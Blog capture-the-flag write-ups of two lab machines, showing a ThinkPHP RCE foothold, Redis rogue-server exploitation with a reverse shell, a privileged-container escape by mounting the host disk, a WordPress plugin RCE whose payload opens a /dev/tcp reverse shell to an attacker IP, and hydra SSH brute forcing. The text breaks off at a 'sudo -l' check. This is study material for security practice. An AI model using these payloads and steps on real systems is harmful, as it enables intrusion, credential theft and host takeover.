Inf0 - https://dirtycow.cn/author/1/ (zh-CN)

Group target box: exchange
https://dirtycow.cn/349.html
Sat, 12 Jul 2025 23:20:00 +0800, Inf0

Web foothold

Target scan

┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.1.39 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-12 01:46 EDT
Nmap scan report for 192.168.1.39
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BD:44:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

Ports 22 and 80 are open.

image-20250712220259253.png

The error page reveals ThinkPHP V5.0.5; its known RCE gives a shell directly.

image-20250712221333094.png

Internal lateral movement

fscan -h 172.19.0.0/24 -np
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-07-12 14:17:09] [INFO] 暴力破解线程数: 1
[2025-07-12 14:17:09] [INFO] 开始信息扫描
[2025-07-12 14:17:09] [INFO] CIDR范围: 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 生成IP范围: 172.19.0.0.%!d(string=172.19.0.255) - %!s(MISSING).%!d(MISSING)
[2025-07-12 14:17:09] [INFO] 解析CIDR 172.19.0.0/24 -> IP范围 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 最终有效主机数量: 256
[2025-07-12 14:17:09] [INFO] 开始主机扫描
[2025-07-12 14:17:09] [INFO] 有效端口数量: 233
[2025-07-12 14:17:21] [SUCCESS] 端口开放 172.19.0.1:22
[2025-07-12 14:17:21] [SUCCESS] 服务识别 172.19.0.1:22 => [ssh] 版本:8.4p1 Debian 5+deb11u3 产品:OpenSSH 系统:Linux 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3.]                                                                                                                  
[2025-07-12 14:17:45] [SUCCESS] 端口开放 172.19.0.3:80
[2025-07-12 14:17:50] [SUCCESS] 服务识别 172.19.0.3:80 => [http] 版本:1.18.0 产品:nginx
[2025-07-12 14:29:31] [SUCCESS] 端口开放 172.19.0.2:6379
[2025-07-12 14:29:36] [SUCCESS] 服务识别 172.19.0.2:6379 => [redis] 版本:5.0.14 产品:Redis key-value store

Scanning the internal network with fscan finds Redis running on 172.19.0.2:6379.

Upload frp, open a SOCKS proxy, and try connecting to Redis.

┌──(root㉿kali)-[~]
└─# proxychains4 -q redis-cli -h 172.19.0.2  -p 6379                                                                                 
172.19.0.2:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:82e99d45f54e2614
redis_mode:standalone
os:Linux 4.19.0-27-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:1
run_id:e88d7ed01f6f98ec6aacd23601cf3eb1ab6cc8df
tcp_port:6379
uptime_in_seconds:1231
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7500446
executable:/data/redis-server
config_file:

# Clients
connected_clients:1
client_recent_max_input_buffer:4
client_recent_max_output_buffer:4100800
blocked_clients:0

# Memory
used_memory:854176
used_memory_human:834.16K
used_memory_rss:12750848
used_memory_rss_human:12.16M
used_memory_peak:4953952
used_memory_peak_human:4.72M
used_memory_peak_perc:17.24%
used_memory_overhead:840974
used_memory_startup:791280
used_memory_dataset:13202
used_memory_dataset_perc:20.99%
allocator_allocated:1424312
allocator_active:1716224
allocator_resident:8458240
total_system_memory:2092433408
total_system_memory_human:1.95G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.20
allocator_frag_bytes:291912
allocator_rss_ratio:4.93
allocator_rss_bytes:6742016
rss_overhead_ratio:1.51
rss_overhead_bytes:4292608
mem_fragmentation_ratio:15.70
mem_fragmentation_bytes:11938672
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1752329680
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:2
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:14801
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:20ebee4cf286daa409471774f86ee700d032f99f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.697228
used_cpu_user:0.911468
used_cpu_sys_children:0.000000
used_cpu_user_children:0.001602

# Cluster
cluster_enabled:0

# Keyspace

Redis has no authentication, but every webshell-writing and reverse-shell technique failed. Talking with bamuwe revealed the reason: the Redis host has no outbound network access.

Either map the attacker's port into the internal network, or map an internal port outward.

The web host has python3, so just upload a simple nc-style listener.

import os
import socket
import sys
import threading

# Minimal nc-style listener: accepts one TCP connection, prints whatever the
# peer sends, and forwards each stdin line to the peer.

def recv_thread(conn):
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                print("\nConnection closed by client.")
                break
            print(data.decode(errors='ignore'), end='', flush=True)
    except Exception as e:
        print(f"\nReceive error: {e}")
    finally:
        conn.close()
        # sys.exit() inside a thread only ends that thread; the main thread
        # would stay blocked on stdin, so terminate the whole process here.
        os._exit(0)

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <listen_port>")
        sys.exit(1)

    listen_port = int(sys.argv[1])

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(('0.0.0.0', listen_port))
    server.listen(1)
    print(f"Listening on 0.0.0.0:{listen_port} ...")

    conn, addr = server.accept()
    print(f"Connection from {addr[0]}:{addr[1]} established!")

    # Reader runs in the background; the main thread only pushes stdin lines.
    t = threading.Thread(target=recv_thread, args=(conn,), daemon=True)
    t.start()

    try:
        while True:
            cmd = sys.stdin.readline()
            if not cmd:
                break
            conn.sendall(cmd.encode())
    except KeyboardInterrupt:
        print("\nUser interrupted.")
    finally:
        conn.close()
        server.close()

if __name__ == "__main__":
    main()

https://github.com/n0b0dyCN/redis-rogue-server

Use this tool to do it all in one go.

2025/07/12 10:59:33 CMD: UID=33    PID=760    | ./pspy64 
2025/07/12 10:59:33 CMD: UID=33    PID=704    | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=703    | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=697    | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=693    | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=692    | md5sum 
2025/07/12 10:59:33 CMD: UID=33    PID=472    | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=471    | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=470    | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=469    | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=465    | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=403    | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=32     | ./frpc -c frps.ini 
2025/07/12 10:59:33 CMD: UID=33    PID=30     | /bin/bash 
2025/07/12 10:59:33 CMD: UID=33    PID=29     | python3 -c import pty;pty.spawn('/bin/bash') 
2025/07/12 10:59:33 CMD: UID=33    PID=28     | sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=24     | sh -c uname -a; w; id; sh -i 
2025/07/12 10:59:33 CMD: UID=33    PID=15     | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=14     | php-fpm: pool www                  
2025/07/12 10:59:33 CMD: UID=33    PID=9      | nginx: worker process          
2025/07/12 10:59:33 CMD: UID=0     PID=8      | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf) 
2025/07/12 10:59:33 CMD: UID=0     PID=7      | nginx: master process /usr/sbin/nginx -g daemon off; 
2025/07/12 10:59:33 CMD: UID=101   PID=6      | /usr/sbin/mariadbd 
2025/07/12 10:59:33 CMD: UID=0     PID=1      | /usr/bin/python3 /usr/bin/supervisord -c /etc/supervisord.conf 
2025/07/12 11:00:01 CMD: UID=0     PID=768    | runc init 
2025/07/12 11:00:01 CMD: UID=0     PID=773    | rm -fv /var/www/html/exp.so 

Note that the server periodically deletes files with a .so extension (the rm -fv /var/www/html/exp.so job is visible in the pspy output); renaming exp.so to a file with no extension is enough to avoid it.

www-data@0bb9bcb43160:/tmp$ python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
< python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 172.19.0.2:6379
[info] SERVER 172.19.0.3:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
r
[info] Open reverse shell...
Reverse server address: 172.19.0.3
172.19.0.3
Reverse server port: 5555
5555
[info] Reverse shell payload sent.
[info] Check at 172.19.0.3:5555
[info] Unload module...

$ python3 s.py
Usage: s.py <listen_port>
$ python3 s.py 5555
id
Listening on 0.0.0.0:5555 ...
Connection from 172.19.0.2:56334 established!
uid=999(redis) gid=999(redis) groups=999(redis)

Successfully obtained a shell as the redis user.

cat /opt/user.txt
flag{user-4f6311d4cf5776f0316c2f1b6526a653}

Privilege escalation

Following bamuwe's hint, check the database on the web host.

www-data@0bb9bcb43160:/tmp$ mysql -uroot -proot
mysql -uroot -proot
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 7
Server version: 10.5.29-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| hnymwl_com_utf8    |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.000 sec)

MariaDB [(none)]> use hnymwl_com_utf8;
use hnymwl_com_utf8;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [hnymwl_com_utf8]> show tables;
show tables;
+---------------------------+
| Tables_in_hnymwl_com_utf8 |
+---------------------------+
| codepay_order             |
| codepay_user              |
| sdad3135                  |
| wp_allot                  |
| wp_area                   |
| wp_balance                |
| wp_bankcard               |
| wp_bankinfo               |
| wp_banks                  |
| wp_cardinfo               |
| wp_catproduct             |
| wp_conf                   |
| wp_config                 |
| wp_gg                     |
| wp_integral               |
| wp_klinedata              |
| wp_newsclass              |
| wp_newsinfo               |
| wp_opentime               |
| wp_order                  |
| wp_order_log              |
| wp_payment                |
| wp_price_log              |
| wp_productclass           |
| wp_productdata            |
| wp_productinfo            |
| wp_refundlog              |
| wp_risk                   |
| wp_usercode               |
| wp_userinfo               |
| wp_webconfig              |
| wp_wechat                 |
+---------------------------+
32 rows in set (0.001 sec)

MariaDB [hnymwl_com_utf8]> select * from wp_userinfo;
select * from wp_userinfo;
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| uid  | username    | upwd                             | utel        | utime      | agenttype | otype | ustatus | oid     | address | portrait | lastlog    | managername | comname | comqua | rebate | feerebate | usertype | wxtype | openid | nickname  | logintime  | usermoney | userpoint | minprice |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
|    1 | admin       | 35a6b91de813873ca887f5d9b681d180 |             | 1480061674 |         2 |     3 |       0 | NULL    | NULL    | NULL     |       NULL | NULL        | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | admin     | NULL       |      0.00 |      NULL |     NULL |
| 5632 | 10005632    | 18aed8d2a11896a6e76180b3d87e64bb | 123456      | 1592404993 |         0 |     0 |       0 | 1       | NULL    | NULL     | 1597391565 | admin       | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | www       | 1597391565 |  11670.00 |      NULL |     NULL |
| 5634 | 18888888888 | cf9c0c4996398526203b25d179b60aad | 18888888888 | 1592469112 |         0 |     0 |       0 | 666     | NULL    | NULL     | 1751965186 | AN          | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | 小可爱    | 1751965186 | 680278.00 |      NULL |     NULL |
| 5635 | 10005635    | f9fb7dcf1f8af5b50235be3cbccf90ee | 19216813711 | 1752205841 |         0 |     0 |       0 | dashazi | NULL    | NULL     | 1752205841 | whatcanisay | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | root      | 1752205841 |      0.00 |      NULL |     NULL |
| 5636 | 10005636    | cafc17ccad5b7523338f81ab912c2750 | 13333333333 | 1752296822 |         0 |     0 |       0 | 1       | NULL    | NULL     | 1752296822 | NULL        | NULL    | NULL   | NULL   | 0         |        0 |      0 | NULL   | test      | 1752296822 |      0.00 |      NULL |     NULL |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
5 rows in set (0.000 sec)

MariaDB [hnymwl_com_utf8]> 

The wp_userinfo table has a row for root with its password hash. Pull the web application's code down and audit it to see how passwords are hashed.

public function login()
{
    $userinfo = Db::name('userinfo');
    // already logged in?
    if (isset($_SESSION['uid'])) {
        $this->redirect('index/index?token='.$this->token);
    }

    if(iswechat() && 1==2){
        // WeChat browser: WeChat login (dead branch, 1==2 is never true)
        if(cookie('wx_info')){
            $wx_info = cookie('wx_info');

            $data['openid'] = $wx_info['openid'];
            $checkuser = Db::name('userinfo')->where($data)->value('uid');
            // already registered?
            if($checkuser){  // registered: record the session directly
                $_SESSION['uid'] = $checkuser;
                // update login time
                $t_data['logintime'] = $t_data['lastlog'] = time();
                $t_data['uid'] = $checkuser;
                $userinfo->update($t_data);
                $this->redirect('index/index');
            }else{  // not registered: register, default password is 123456
                $data['nickname'] = $wx_info['nickname'];
                $data['utime'] = time();
                //$data['upwd'] = md5('123456'.$data['utime']);
                $data['otype'] = 0;
                $data['ustatus'] = 0;
                $data['address'] = $wx_info['country'].$wx_info['province'].$wx_info['city'];
                $data['portrait'] = $wx_info['headimgurl'];
                if(isset($_SESSION['fid']) && $_SESSION['fid']>0){
                    $fid = $_SESSION['fid'];
                    $fid_info = $userinfo->where(array('uid'=>$fid,'otype'=>101))->value('uid');
                    if($fid_info){
                        $data['oid'] = $fid;
                    }
                }
                // insert the record
                $ids = $userinfo->insertGetId($data);
                $newdata['uid'] = $ids;
                $newdata['username'] = 10000000+$ids;
                $newids = $userinfo->update($newdata);
                // clear the cookie for safety
                cookie('wx_info', null);
                // record the session
                $_SESSION['uid'] = $ids;
                // update login time
                $t_data['logintime'] = $t_data['lastlog'] = time();
                $t_data['uid'] = $ids;
                $userinfo->update($t_data);
                $this->redirect('login/addpwd?token='.$this->token);
            }
        }else{
            $this->redirect('wechat/get_wx_userinfo');
        }

    }else{
        // web user login request
        if(input('post.')){
            $data = input('post.');
            // validate user input
            if(!isset($data['username']) || empty($data['username'])){
                return WPreturn('请输入用戶名!',-1);
            }
            if(!isset($data['upwd']) || empty($data['upwd'])){
                return WPreturn('请输入密碼!',-1);
            }
            // look up the user: the same input is matched against username, nickname and phone
            $result = $userinfo
                ->where('username',$data['username'])->whereOr('nickname',$data['username'])->whereOr('utel',$data['username'])
                ->field("uid,upwd,username,utel,utime,otype,ustatus")->find();
            // verify the user
            if(empty($result)){
                return WPreturn('登录失败,用戶名不存在!',-1);
            }else{
                if(!in_array($result['otype'], array(0,101))){  // non-customers may not log in
                    return WPreturn('您无权登录!',-1);
                }
                // password check: MD5 of password . account-creation time, compared with a loose ==
                if($result['upwd'] == md5($data['upwd'].$result['utime'])){
                    if ($result['ustatus']==0)
                    {
                        $_SESSION['uid'] = $result['uid'];
                        // update login time
                        $t_data['logintime'] = $t_data['lastlog'] = time();
                        $t_data['uid'] = $result['uid'];
                        $userinfo->update($t_data);
                        return WPreturn('登录成功!',1);
                    }elseif($result['ustatus']==1){
                        return WPreturn('登录失败,您的账户暂时被冻结!',-1);
                    }else{
                        return WPreturn('登录失败,用戶名不存在!',-1);
                    }
                }
                else{
                    return WPreturn('登录失败,密碼错误!',-1);
                }
            }
        }
        return $this->fetch();
    }
}

The stored password is md5(password . utime): an MD5 of the password concatenated with the account-creation timestamp, which sits in the same table row.

You could write a script to brute-force it, or skip that: the group chat gave the hint directly that the password is whatcanisay, the value in the managername column.
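As an added example (not code from the write-up or from the application), the scheme login() uses next to a safer replacement, in Python: legacy_hash and legacy_login reproduce md5($upwd . $utime) and the otype/ustatus gating, while hardened_hash and hardened_verify show a per-user random salt with PBKDF2. The sample row, its password and its timestamp are constructed; none of the real wp_userinfo values are reused.

```python
import hashlib
import hmac
import os
from typing import Optional


def legacy_hash(password: str, utime: int) -> str:
    """The application's scheme: md5($upwd . $utime), hex-encoded.
    utime is the account-creation timestamp stored in the same row, so anyone
    who reads the table has every input needed to test candidates at MD5 speed."""
    return hashlib.md5((password + str(utime)).encode()).hexdigest()


def legacy_login(row: dict, username: str, password: str) -> str:
    """Mirror the checks in login(): lookup, otype gate, hash compare, ustatus gate.
    Returns a short status instead of the WPreturn() messages."""
    # login() matches username, nickname OR utel against the same input field
    if username not in (row["username"], row["nickname"], row["utel"]):
        return "no_such_user"
    if row["otype"] not in (0, 101):
        return "no_permission"
    # PHP compares with a loose ==; compare_digest avoids the type juggling and
    # the timing leak, but the unsalted fast hash itself is still the weakness.
    if not hmac.compare_digest(row["upwd"], legacy_hash(password, row["utime"])):
        return "bad_password"
    if row["ustatus"] == 1:
        return "frozen"
    if row["ustatus"] != 0:
        return "no_such_user"
    return "ok"


def hardened_hash(password: str, salt: Optional[bytes] = None,
                  iterations: int = 200_000) -> str:
    """Replacement: PBKDF2-HMAC-SHA256 with a random 16-byte salt; the
    parameters travel with the hash so they can be raised later."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def hardened_verify(stored: str, password: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample row with the columns login() selects; the password
# "s3cret-demo" and every value here are made up, not the target's data.
SAMPLE_UTIME = 1700000000
SAMPLE_ROW = {
    "uid": 9001, "username": "10009001", "nickname": "demo",
    "utel": "13000000000", "utime": SAMPLE_UTIME,
    "upwd": legacy_hash("s3cret-demo", SAMPLE_UTIME),
    "otype": 0, "ustatus": 0,
}

if __name__ == "__main__":
    print(legacy_login(SAMPLE_ROW, "demo", "s3cret-demo"))
    print(hardened_verify(hardened_hash("s3cret-demo"), "s3cret-demo"))
```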

Log in as root on the Redis host.

cat /proc/self/status |grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

CapBnd is the full capability set, so this is presumably a privileged container.
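As an added example (not part of the write-up), a small Python checker that decodes the Cap* lines of /proc/&lt;pid&gt;/status the way the guess above does: a CapBnd with every bit set from 0 upward means nothing was dropped when the container started, and the difference against Docker's default bounding set lists what a root process inside it would gain. The status text is a constructed copy of the lines shown above; the capability names and the Docker default mask 0xa80425fb are assumed from the kernel header and Docker's default capability list as I know them.

```python
import re
from typing import Dict, Set

# Capability bit numbers from linux/capability.h (bits 0..40).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Bounding set Docker grants a non-privileged container by default (14 caps), assumed value.
DOCKER_DEFAULT_MASK = 0x00000000A80425FB

# Constructed sample: the Cap* lines as they appear in the write-up above.
SAMPLE_STATUS = """\
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
"""


def decode_caps(mask: int) -> Set[str]:
    """Map a capability bitmask to capability names (cap_N for unknown bits)."""
    names = set()
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            names.add(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"cap_{bit}")
        bit += 1
    return names


def parse_cap_lines(status_text: str) -> Dict[str, int]:
    """Pull the hex Cap* fields out of /proc/<pid>/status text."""
    caps = {}
    for m in re.finditer(r"^(Cap\w+):\s*([0-9a-fA-F]+)\s*$", status_text, re.M):
        caps[m.group(1)] = int(m.group(2), 16)
    return caps


def assess(status_text: str) -> dict:
    caps = parse_cap_lines(status_text)
    bnd = caps.get("CapBnd", 0)
    # Contiguous ones from bit 0 (mask & (mask + 1) == 0) means the bounding set is
    # every capability the running kernel knows: the --privileged signature.
    full_set = bnd != 0 and (bnd & (bnd + 1)) == 0
    beyond = decode_caps(bnd) - decode_caps(DOCKER_DEFAULT_MASK)
    return {
        "cap_bnd": bnd,
        "cap_count": len(decode_caps(bnd)),
        "full_bounding_set": full_set,
        # CapEff is empty here only because the process is uid 999; anything that
        # becomes root in this container (su, a setuid binary) gets the whole set.
        "beyond_docker_default": sorted(beyond),
        "effective_now": sorted(decode_caps(caps.get("CapEff", 0))),
    }


if __name__ == "__main__":
    for k, v in assess(SAMPLE_STATUS).items():
        print(f"{k}: {v}")
```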

ls /dev/ | grep sda
sda
sda1
sda2
sda5
mount /dev/sda1 /mnt
cd /mnt
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root 
ls
root.txt
cat root.txt
flag{root-6dbfaf239023f6da6ed2ffc59d3bcea5}

Mounting sda1 reveals the host's filesystem: container escape successful.

Group target box: New
https://dirtycow.cn/345.html
Wed, 02 Jul 2025 20:00:00 +0800, Inf0

Web foothold

image-20250702082959738.png

It's WordPress; clicking around redirects to http://new.dsz, so add a hosts entry.

For WordPress, follow the usual process: enumerate users with wpscan and try password brute-forcing first. That yields nothing.

image-20250702083232613.png

The site uses the Social Warfare v3.5.2 plugin; a quick search turns up the RCE: https://github.com/hash3liZer/CVE-2019-9978

┌──(root㉿kali)-[~]
└─# cat payload
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>

┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$ 

Shell obtained.

Privilege escalation

www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$ 

Under /opt there is an executable andeli_cred; running it prints a pile of MD5-looking values. Try those strings as a wordlist against the andeli user.

┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1  ssh://192.168.1.36 -vV -f -t 10 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36   login: andeli   password: 9eeb22195b4eb7a35bcad0f45761eb7b

Log in over SSH and run the usual basic checks; look for SUID binaries, nothing exploitable.

Check sudo -l.

andeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
